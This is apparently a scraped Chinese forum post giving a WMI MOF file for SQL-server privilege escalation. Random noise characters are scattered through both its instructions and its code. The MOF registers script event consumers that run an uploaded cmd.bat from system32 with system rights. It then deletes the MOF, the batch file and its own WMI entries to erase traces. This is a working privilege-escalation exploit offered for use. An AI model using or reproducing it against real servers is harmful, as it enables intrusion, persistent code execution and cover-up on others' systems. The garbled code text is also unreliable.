这个sql提权MOF需要运行 system下的文件,不能定义路径。
! [4 v6 f6 Q ~( q. l+ D6 a需要将要运行的命令写入到bat上传到system32目录,然后执行。
2 {! W8 e. p. W: p; Z- j4 l: U
) g- C, o- M( t1 a! Y5 c这个sql提权MOF需要运行 system下的文件,不能定义路径。' G. a) i8 f9 {" ]( T' h
需要将要运行的命令写入到bat上传到system32目录,然后执行。
9 D9 i q; Z6 ]' ?9 @6 a8 m6 e
2 G: C8 t$ g. Z; Z4 J5 t/ M9 _: I#pragma
3 o7 N9 C" u( h namespace("\\\\.\\root\\cimv2")
' w- |# A0 \( I# m2 t3 r+ U8 h class6 Q8 A2 b- r6 S. }4 p# _; g6 B
MyClass547
6 H; {2 g. V5 i# U { [key]/ `& X6 s/ m4 p' z& M& C) l* X
string
0 R) V5 x2 _0 N) |+ D. b" m Name;0 D. u+ S. |5 f1 j
};. a$ e8 Y0 l- h0 M
class4 B" O, X+ b/ {2 L4 ~% d
ActiveScriptEventConsumer# x; o4 W1 T5 A
: __EventConsumer { [key]2 u+ ]+ G5 m3 b! e( E: J" d
string
4 J; C$ j4 K7 I Name; [not_null]
" U' V) E, ^* s; i& | string# a. c. ~) }) V. G2 w
ScriptingEngine; string
# x. t! S. e6 r t9 h( w2 ~ ScriptFileName; [template]
0 N" g* c# I! i; \) w string
; c/ p K; |# j+ [/ c ScriptText; uint32 KillTimeout;" \8 F' y5 f2 v0 Q, I& _9 ^
}; instance of __Win32Provider as $P {
" N; _! X: _+ e. p; O- u Name3 U _4 S9 O' d" p3 i/ b) q
=
O+ K0 s* K; B& U; x "ActiveScriptEventConsumer"; CLSID =
& i. e: O/ R6 o+ F9 r) `3 d "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
$ ]* ]. `9 Z- c: ? PerUserInitialization! m# w9 q* U' T7 R' Y
= TRUE;
6 ?+ {1 t0 I, I9 u7 S }; instance of __EventConsumerProviderRegistration { Provider8 V' h4 z' b% w7 `2 M
= $P; ConsumerClassNames. \2 Q7 {+ ]$ W' f: O$ E) S
=: ~& B8 t* d/ P8 O k. Y% d/ S( `0 P
{"ActiveScriptEventConsumer"};
% l% q$ r U) w* w; V1 f) R) Z };- J! o4 P& _% u0 C5 r
Instance of ActiveScriptEventConsumer
w2 }; L; x( C& |2 G6 A1 m as $cons { Name
; }, c) ?. R! I9 E" Q( @ =
( _+ g# E* h/ Q5 h" n "ASEC"; ScriptingEngine
* w6 O: a* ^! A) _) x* S =
+ l( _! G' h$ N: I& J "JScript"; ScriptText0 d) f1 c3 q- J1 `/ _+ j" K
=% G' | t! Y% }9 I; ]
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
& y7 C6 D3 B' x# _ Instance of ActiveScriptEventConsumer
7 h2 a9 B2 C1 a' @ as $cons2 { Name1 r' ~# L) T/ y/ @: a. r( u/ g
=
# ~+ h5 Y) Q6 o/ e% u "qndASEC"; ScriptingEngine
/ y: \2 S- z0 L( j$ I8 f, B( E$ M/ r =
3 s( w$ l. ?8 R. Y "JScript"; ScriptText# {% h+ G T9 m
=
) l% M" E R+ \: z# V( n "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
5 O; N3 b+ X! \0 i, A; b9 o; {+ D }; instance of __EventFilter as $Filt { Name% Y" C" G9 H! |6 x. E) `6 Y4 ^
=# ]3 k. e! j) m
"instfilt"; Query9 [- r6 ?" n4 |
=
7 Y" \: u+ ~1 F- j6 b+ H9 p* h* ]- ] "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage: N/ e7 Y/ a1 G) @( g! e
=
. M4 ~+ u( L S) B& m "WQL"; }; instance of __EventFilter as $Filt2 { Name
! x/ V+ _6 u7 m. U$ ^ =3 h: I O6 `! R) Z- G6 ~
"qndfilt"; Query3 r( P5 \: V5 v4 W/ P
=, F! B: a, L) U5 O, L8 u
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
, h& F- n n* l8 J =" J6 K2 O4 B3 [9 x+ \! k: v
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer: s* H* x/ a+ t8 c9 c# I* e
= $cons; Filter$ c' ]' |( c; R6 d5 N
= $Filt;8 O+ u% x& Z+ \
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
& Y5 T) z4 Z/ m = $cons2; Filter
$ `2 }; N0 C$ R+ X = $Filt2;
e& P8 y6 w% M0 u: p7 K1 @# }1 \' i7 T6 x }; instance of MyClass547
F0 @5 a9 h. N3 P" c# |% Z2 Q as $MyClass { Name
- w! F- }; C3 e* i5 L1 V/ X =
3 m1 N( N: q9 Z/ e "ClassConsumer";
9 Q( s4 A0 i" X# H3 G6 g }; |